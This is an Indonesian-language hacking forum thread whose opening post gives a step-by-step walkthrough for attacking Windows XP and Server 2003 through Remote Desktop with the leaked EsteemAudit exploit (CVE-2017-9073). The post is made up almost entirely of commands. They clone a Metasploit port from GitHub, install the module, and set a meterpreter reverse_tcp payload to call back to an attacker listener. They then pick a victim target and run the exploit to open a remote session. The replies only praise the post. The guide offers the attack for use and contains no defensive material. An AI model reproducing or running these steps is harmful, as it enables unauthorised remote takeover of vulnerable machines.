RDP Exploit dengan EsteemAudit

by penjagalilin - 06-11-2017 at 12:03 PM
Hydrus
Hydrus
Posts:
23
Joined:
Jun 2016
Likes:
0
Reputation:
0
2 Year Of Service
#1
OP
Posted: 06-11-2017, 12:03 PM
Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.

[Image: Untitled-1.png]

Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit


1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit

Atau clone langsung seperti berikut

Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l



2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.

Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/



3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit

Code:
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER
msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER
msf exploit(esteemaudit) > set TARGETARCHITECTURE x86

Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit 

Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut

Code:
msf exploit(esteemaudit) > show targets

[Image: Lp-lKatrRRWov39DR-Ykww.png]

Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.

Code:
msf exploit(esteemaudit) > set TARGET 4
msf exploit(esteemaudit) > exploit

Jika sukses akan terbuka sesi meterpreter seperti berikut.

[Image: aIkCQ0tqRV2IE2LSpSZMog.png]




Bonus Video :







NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.

Oke sekian pos nya, semoga bermanfaat. Terimakasih.
{There's no God in My Code}
Reply
Find Posts
Administrator
Administrators
Posts:
77
Joined:
Mar 2016
Likes:
2
Reputation:
0
Admin
2 Year Of Service
#2
Posted: 06-11-2017, 12:21 PM
semakin di depan (y)
Reply
Find Posts
Hydrus
Hydrus
Posts:
23
Joined:
Jun 2016
Likes:
0
Reputation:
0
2 Year Of Service
#3
OP
Posted: 06-13-2017, 01:27 AM
zeeeeb mhanx
{There's no God in My Code}
Reply
Find Posts
Network Security Analyst
Administrators
Posts:
17
Joined:
Mar 2016
Likes:
0
Reputation:
0
Admin
2 Year Of Service
#4
Posted: 06-14-2017, 03:24 PM
Mantap mhanx
={EXPLORE|EXPLOIT|HAVE FUN!}=
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)